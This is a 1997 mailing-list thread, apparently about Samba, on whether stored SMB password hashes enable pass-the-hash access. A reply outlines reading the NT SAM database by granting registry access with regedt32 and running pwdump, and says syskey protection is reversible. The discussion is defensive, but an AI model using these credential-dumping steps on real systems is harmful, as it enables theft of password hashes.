Jacques Gelinas
1997-Oct-16 12:59 UTC
crypted SMB passwords: security issue only on Unix ?
I have been reading the FAQ on the SMB crypted passwords. This FAQ states that there is a security issue. Mostly, if someone manage to grab a copy of my smbpasswd file and has access to a modified client, he can access my share without really knowing the original password (He supply the crypted one only). I understand pretty well the issue here. It seems that NT does not have this problem, or at least try to cope with it (Well they could have fixed the protocol for one and this would have solved the problem!). Sounds like NT passwords are stored in a protected area (not part of the file system) and they are further protected by a key. So the crypted passwords are more difficult to read. (while probably not impossible to steal) Anyone can confirm this ? -------------------------------------------------------- Jacques Gelinas (jacques@solucorp.qc.ca) Linuxconf: The ultimate administration system for Linux. see http://www.solucorp.qc.ca/linuxconf new developments: mail to fax gateway, Apache, Samba
Luke Kenneth Casson Leighton
1997-Oct-16 15:58 UTC
crypted SMB passwords: security issue only on Unix ?
On Thu, 16 Oct 1997, Jacques Gelinas wrote:> I have been reading the FAQ on the SMB crypted passwords. This FAQ states > that there is a security issue. Mostly, if someone manage to grab a copy > of my smbpasswd filewhich will only be possible, if you have followed the instructions in ENCRYPTION.txt, if they have root access. if they have root access, then the smbpasswd file is the least of your worries.> and has access to a modified client, he can access my > share without really knowing the original password (He supply the crypted > one only). I understand pretty well the issue here. > > It seems that NT does not have this problem,ho ho ho. hee hee hee.> or at least try to cope > with it (Well they could have fixed the protocol for one and this would > have solved the problem!). Sounds like NT passwords are stored in a > protected areanot really. use regedt32 as administrator to grant access to the SAM database, and then run pwdump. or, run the equivalent NT resource kit program.> (not part of the file system) and they are further > protected by a key.ho ho ho. hee hee hee. not in < NT 4.0 SP3 they aren't. and only in >= NT 4.0 SP3 have they added _YET ANOTHER_ level of obfuscation, using a little program called syskey.exe.> So the crypted passwords are more difficult to read.if NT 4.0 can decrypt the SAM database (reverse-crypt performed by syskey) then so can anyone else.> (while probably not impossible to steal) > > Anyone can confirm this ?consider this a confirmation. luke <a href="mailto:lkcl@switchboard.net" > Luke Kenneth Casson Leighton </a> <a href="http://mailhost.cb1.com/~lkcl"> Lynx2.7-friendly Home Page </a> <br><b> "Apply the Laws of Nature to your environment before your environment applies the Laws of Nature to you" </b>